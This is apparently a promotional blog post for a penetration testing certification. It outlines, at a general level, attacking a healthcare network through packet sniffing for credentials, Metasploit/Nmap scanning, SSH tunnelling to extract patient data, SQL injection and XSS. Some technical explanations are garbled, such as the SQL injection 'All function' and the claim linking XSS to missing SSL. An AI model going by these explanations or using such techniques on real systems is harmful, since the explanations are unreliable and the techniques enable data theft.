Advanced penetration testing is performing assessments against known or unknown applications, systems, and networks that are fully patched and hardened. In this case, network and software-based intrusion detection and prevention systems are put in place. With the recent pandemic, the healthcare industry is facing a large array of challenges, including those that cybercriminals pose. The World Health Organization (WHO), the Department of Health and Human Services (HHS), and a large coronavirus testing facility in the Czech Republic were all successfully attacked in recent weeks. Ever ruthless, cyber criminals are viewing the current grave situation as a golden opportunity to target the healthcare industry.
For a brief look at what a cyber-attack can do to a healthcare system, watch this video:
What does advanced penetration testing involve?
There are many things that a penetration test entails. Since healthcare systems are hubs of data, we will use three advanced penetration techniques to exploit vulnerabilities in this system.
First, we will use a packet sniffing tool known as Wireshark. What Wireshark will do is that it will provide us with all the data traffic passing through this healthcare network. As long as we are connected to the network, Wireshark gives us the ability to eavesdrop on all the networks’ communications and capture data such as usernames and passwords. Wireshark will capture this data in a form of strings that we can now retrieve and use it to exploit the system and access sensitive information like usernames, passwords, and credit card details.
The second way we will try to penetrate the system is by scanning for vulnerabilities using Metasploit. What we’ll simply do is perform a Nmap scan from within Metasploit. Below are sample results we may obtain:
- Nmap: Nmap scan report for 192.168.75.14
- [*] Nmap: Host is up (0.00059s latency).
- [*] Nmap: PORT STATE SERVICE
- [*] Nmap: 22/tcp open ssh
- [*] Nmap: 80/tcp open http
From the above results, we can deduce that two TCP ports, 22 and 80, are open. We can then exploit one of these ports, say port 22, via SSH port forwarding. What this does is that it simply creates a secure SSH tunnel to the server and therefore allows us to exchange information with the systems’ servers. We could use this to extract patient data.
3. SQL Injection
The third way in which we can penetrate the system is via a SQL injection attack. We will use SQL injection to manipulate database queries by injecting them with malicious strings. In our case, the healthcare system uses a web application to communicate with the server. For the injection, we will write a simple code known as the All function which will create an All logic gate in the server. This function will manipulate the SQL query to always return true. This will allow us to log into the server without true credentials.
If by any chance the healthcare systems’ web application does not use SSL, secure socket layer, we could penetrate it by launching an XSS attack. XSS, cross-site scripting, enables us to inject malicious script into the users’ web browser which affects the web application by stealing cookies, session tokens, and personal information. This script can also be used to modify the contents of a website like the addition of fake links that redirect users to malicious websites.
How long does a penetration test take?
The length of the penetration test largely depends on the type of testing done, what type of devices/ networks are tested, and the number of systems.
As seen from above, and with the increased demand for cyber security in healthcare, a penetration tester needs to have real-world knowledge of advanced penetration testing techniques to provide their client with the best results. These techniques need to be as real as possible to mimic what the bad guys are doing so the organization can implement steps to help prevent these kinds of attacks.
According to EC-Council President Jay Bavisi, “With the recent Equifax incident and the multitude of other data security breaches in recent years, the need for skilled, vetted penetration testers has increased for the world’s organizations. The LPT (Master) exam simulates a real-world environment and requires candidates to correctly identify any security threats and weaknesses against social, physical, network, and application attacks.”
How much do penetration testers get paid?
What is the best penetration testing certification?
Obtaining the Licensed Penetration Tester Master (L|PT Master) proves that you have the real-world know-how of advanced penetration testing. One of the main goals of the L|PT (Master) program is to not just test your knowledge of penetration testing but to put the pressure of being watched on you as you’re trying to complete one of the challenges. The L|PT (Master) exam is built on EC-Council’s Advanced Penetration Testing Cyber Range (ECCAPT), which consists of the following:
- 100% hands-on
- 180 machines
- 250 GB of RAM
- Over 4TB of storage
- 5 to 8 subnets in every range
- Over 15 Windows and Linux flavors